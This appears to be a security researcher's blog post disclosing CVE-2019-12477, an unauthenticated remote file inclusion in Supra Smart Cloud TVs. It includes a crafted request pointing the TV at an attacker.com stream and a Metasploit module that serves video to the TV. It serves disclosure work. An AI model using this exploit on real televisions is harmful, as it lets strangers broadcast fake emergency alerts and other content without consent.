Hacking Smart TV’s

Hacking Smart TV’s

Cognosec researchers identified multiple vulnerabilities in Smart TV’s. With the rise in the usage of smart devices & Internet of things, publicly exposed devices have become a part of targeted attacks.

SUPRA is a Russia electronics brand on the Internet that manufactures several affordable audio-video equipment’s, household appliances and car electronics, most of which are being distributed through Russian, Chinese, Russian and UAE-based e-commerce websites.

Supra Smart Cloud TV allows remote file inclusion in the openLiveURL function, which allows a local attacker to broadcast fake video without any authentication via a /remote/media_control?action=setURI&uri=URI

Technical Observation:
We are abusing openLiveURL() which allows a local attacker to broadcast video on supra smart cloud TV. I found this vulnerability initially by source code review and then by crawling the application and reading every request helped me to trigger this vulnerability.

To trigger the vulnerability you can send a crafted request to the URL,
http://[IPTV]/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8

Although the above mention URL takes (.m3u8) format based video. We can use `curl -v -X GET` to send such request, typically this is an unauthenticated remote file inclusion. An attacker could broadcast any video without any authentication, the worst case attacker could leverage this vulnerability to broadcast a fake emergency message.

The below video PoC shows a successful demonstration of this attack where Mr.Steve Jobs speech is suddenly replaced with attacker fake “Emergency Alert Message” this may make end user panic.

Post this, we converted this exploit to a Metasploit module which broadcast video of epic sax guy to the remote vulnerable TV.

def run
    start_service('Path' => '/')
    print_status("Broadcasting Epic Sax Guy to #{peer}")
    res = send_request_cgi(
      'method'        => 'GET',
      'uri'           => '/remote/media_control',
      'encode_params' => false,
      'vars_get'      => {
        'action'      => 'setUri',
        'uri'         => get_uri + 'epicsax.m3u8'
      }
    )
    unless res && res.code == 200 && res.body.include?('OK')
      print_error('No doo-doodoodoodoodoo-doo for you')
      return
    end
    # Sleep time calibrated using successful pcap
    print_good('Doo-doodoodoodoodoo-doo')
    print_status('Sleeping for 10s serving .m3u8 and .ts files...')
    sleep(10)
  end
  def on_request_uri(cli, request)
    dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-12477')
    files = {
      '/epicsax.m3u8' => 'application/x-mpegURL',
      '/epicsax0.ts'  => 'video/MP2T',
      '/epicsax1.ts'  => 'video/MP2T',
      '/epicsax2.ts'  => 'video/MP2T',
      '/epicsax3.ts'  => 'video/MP2T',
      '/epicsax4.ts'  => 'video/MP2T'
    }
    file = request.uri
    unless files.include?(file)
      vprint_error("Sending 404 for #{file}")
      return send_not_found(cli)
    end
    data = File.read(File.join(dir, file))
    vprint_good("Sending #{file}")
    send_response(cli, data, 'Content-Type' => files[file])
  end
end

The vulnerability is tracked by CVE-2019-12477 and this research was featured in Threatpost, TheHackerNews, TheRegister.

Leave a Reply